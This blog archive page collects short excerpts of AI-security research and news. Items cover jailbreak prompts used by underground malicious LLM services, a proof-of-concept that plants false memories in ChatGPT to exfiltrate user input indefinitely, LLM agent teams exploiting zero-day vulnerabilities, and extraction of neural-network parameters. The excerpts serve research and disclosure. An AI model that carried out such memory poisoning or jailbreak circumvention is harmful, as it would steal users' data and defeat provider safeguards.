I’ve been writing about the possibility of AIs automatically discovering code vulnerabilities since at least 2018. This is an ongoing area of research: AIs doing source code scanning, AIs finding zero-days in the wild, and everything in between. The AIs aren’t very good at it yet, but they’re getting better.
… Since July 2024, ZeroPath is taking a novel approach combining deep program analysis with adversarial AI agents for validation. Our methodology has uncovered numerous critical vulnerabilities in production systems, including several that traditional Static Application Security Testing (SAST) tools were ill-equipped to find. This post provides a technical deep-dive into our research methodology and a living summary of the bugs found in popular open-source tools. — Read More
Tag Archives: Cyber
Malla: Demystifying Real-world Large Language Model Integrated Malicious Services
The underground exploitation of large language models (LLMs) for malicious services (i.e., Malla) is witnessing an uptick, amplifying the cyber threat landscape and posing questions about the trustworthiness of LLM technologies. However, there has been little effort to understand this new cybercrime, in terms of its magnitude, impact, and techniques. In this paper, we conduct the first systematic study on 212 real-world Mallas, uncovering their proliferation in underground marketplaces and exposing their operational modalities. Our study discloses the Malla ecosystem, revealing its significant growth and impact on today’s public LLM services. Through examining 212 Mallas, we uncovered eight backend LLMs used by Mallas, along with 182 prompts that circumvent the protective measures of public LLM APIs. We further demystify the tactics employed by Mallas, including the abuse of uncensored LLMs and the exploitation of public LLM APIs through jailbreak prompts. Our findings enable a better understanding of the real-world exploitation of LLMs by cybercriminals, offering insights into strategies to counteract this cybercrime. — Read More
Hacker plants false memories in ChatGPT to steal user data in perpetuity
When security researcher Johann Rehberger recently reported a vulnerability in ChatGPT that allowed attackers to store false information and malicious instructions in a user’s long-term memory settings, OpenAI summarily closed the inquiry, labeling the flaw a safety issue, not, technically speaking, a security concern.
So Rehberger did what all good researchers do: He created a proof-of-concept exploit that used the vulnerability to exfiltrate all user input in perpetuity. OpenAI engineers took notice and issued a partial fix earlier this month. — Read More
Generative AI Misuse: A Taxonomy of Tactics and Insights from Real-World Data
Generative, multimodal artificial intelligence (GenAI) offers transformative potential across industries, but its misuse poses significant risks. Prior research has shed light on the potential of advanced AI systems to be exploited for malicious purposes. However, we still lack a concrete understanding of how GenAI models are specifically exploited or abused in practice, including the tactics employed to inflict harm. In this paper, we present a taxonomy of GenAI misuse tactics, informed by existing academic literature and a qualitative analysis of approximately 200 observed incidents of misuse reported between January 2023 and March 2024. Through this analysis, we illuminate key and novel patterns in misuse during this time period, including potential motivations, strategies, and how attackers leverage and abuse system capabilities across modalities (e.g. image, text, audio, video) in the wild. — Read More
Polynomial Time Cryptanalytic Extraction of Neural Network Models
Billions of dollars and countless GPU hours are currently spent on training Deep Neural Networks (DNNs) for a variety of tasks. Thus, it is essential to determine the difficulty of extracting all the parameters of such neural networks when given access to their black-box implementations. Many versions of this problem have been studied over the last 30 years, and the best current attack on ReLU-based deep neural networks was presented at Crypto’20 by Carlini, Jagielski, and Mironov. It resembles a differential chosen plaintext attack on a cryptosystem, which has a secret key embedded in its black-box implementation and requires a polynomial number of queries but an exponential amount of time (as a function of the number of neurons)
In this paper, we improve this attack by developing several new techniques that enable us to extract with arbitrarily high precision all the real-valued parameters of a ReLU-based DNN using a polynomial number of queries and a polynomial amount of time. We demonstrate its practical efficiency by applying it to a full-sized neural network for classifying the CIFAR10 dataset, which has 3072 inputs, 8 hidden layers with 256 neurons each, and about 1.2 million neuronal parameters. An attack following the approach by Carlini et al. requires an exhaustive search over 2256 possibilities. Our attack replaces this with our new techniques, which require only 30 minutes on a 256-core computer. — Read More
Teams of LLM Agents can Exploit Zero-Day Vulnerabilities
LLM agents have become increasingly sophisticated, especially in the realm of cybersecurity. Researchers have shown that LLM agents can exploit real-world vulnerabilities when given a description of the vulnerability and toy capture-the-flag problems. However, these agents still perform poorly on real-world vulnerabilities that are unknown to the agent ahead of time (zero-day vulnerabilities).
In this work, we show that teams of LLM agents can exploit real-world, zero-day vulnerabilities. Prior agents struggle with exploring many different vulnerabilities and long-range planning when used alone. To resolve this, we introduce HPTSA, a system of agents with a planning agent that can launch subagents. The planning agent explores the system and determines which subagents to call, resolving long-term planning issues when trying different vulnerabilities. We construct a benchmark of 15 real-world vulnerabilities and show that our team of agents improve over prior work by up to 4.5x. — Read More
Turkish student using AI software to cheat on a university exam arrested
A Turkish student who used AI software, a camera disguised as a button, and a hidden router, to cheat on a university exam has been detained.
The student was spotted behaving in a suspicious way during the TYT exam on June 8 and was detained by police, before being formally arrested and sent to jail pending trial. — Read More
Securing Research Infrastructure for Advanced AI
We’re sharing some high-level details on the security architecture of our research supercomputers.
OpenAI operates some of the largest AI training supercomputers, enabling us to deliver models that are industry-leading in both capabilities and safety while advancing the frontiers of AI. Our mission is to ensure that advanced AI benefits everyone, and the foundation of this work is the infrastructure that powers our research.
To achieve this mission safely, we prioritize the security of these systems. Here, we outline our current architecture and operations that support the secure training of frontier models at scale. This includes measures designed to protect sensitive model weights within a secure environment for AI innovation. While these security features will evolve over time, we think it’s valuable to provide a current snapshot of how we think about security of our research infrastructure. We hope this insight will assist other AI research labs and security professionals as they approach securing their own systems (and we’re hiring). — Read More
Meta says it removed six influence campaigns including those from Israel and China
Meta says it cracked down on propaganda campaigns on its platforms, including one that used AI to influence political discourse and create the illusion of wider support for certain viewpoints, according to its quarterly threat report published today. Some campaigns pushed political narratives about current events, including campaigns coming from Israel and Iran that posted in support of the Israeli government.
The networks used Facebook and Instagram accounts to try to influence political agendas around the world. The campaigns — some of which also originated in Bangladesh, China, and Croatia — used fake accounts to post in support of political movements, promote fake news outlets, or comment on the posts of legitimate news organizations. — Read More
In a first, OpenAI removes influence operations tied to Russia, China and Israel
Online influence operations based in Russia, China, Iran, and Israel are using artificial intelligence in their efforts to manipulate the public, according to a new report from OpenAI.
Bad actors have used OpenAI’s tools, which include ChatGPT, to generate social media comments in multiple languages, make up names and bios for fake accounts, create cartoons and other images, and debug code.
OpenAI’s report is the first of its kind from the company, which has swiftly become one of the leading players in AI. ChatGPT has gained more than 100 million users since its public launch in November 2022. — Read More